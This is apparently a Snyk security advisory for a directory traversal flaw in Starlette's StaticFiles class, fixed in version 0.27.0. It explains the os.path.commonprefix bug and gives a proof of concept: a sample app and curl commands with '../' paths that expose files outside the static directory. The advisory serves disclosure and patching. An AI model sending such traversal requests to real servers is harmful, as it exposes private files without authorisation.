Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade starlette
to version 0.27.0 or higher.
starlette is a The little ASGI library that shines.
Affected versions of this package are vulnerable to Directory Traversal when using the StaticFiles
class. If there is a file or directory that starts with the same name as the StaticFiles
directory that file or directory is also exposed via StaticFiles
when os.path.commonprefix()
returns the longest common prefix between two paths.
Passing a path like /static/../static1.txt
, os.path.commonprefix([full_path, directory])
returns ./static
, which is the common part of ./static1.txt
and ./static
. It refers to /static/../static1.txt
because it is considered in the staticfiles
directory. As a result, it becomes possible to view files that should not be open to the public.
Using a directory structure like
├── static
│ ├── index.html
├── static_disallow
│ ├── index.html
└── static1.txt
run the Starlette
app with:
import uvicorn from starlette.applications import Starlette from starlette.routing import Mount from starlette.staticfiles import StaticFiles
routes = [ Mount("/static", app=StaticFiles(directory="static", html=True), name="static"), ]
app = Starlette(routes=routes)
if name == "main": uvicorn.run(app, host="0.0.0.0", port=8000)
Then run the commands
curl --path-as-is 'localhost:8000/static/../static_disallow/'
curl --path-as-is 'localhost:8000/static/../static1.txt'
The static1.txt
and the directory static_disallow
are exposed.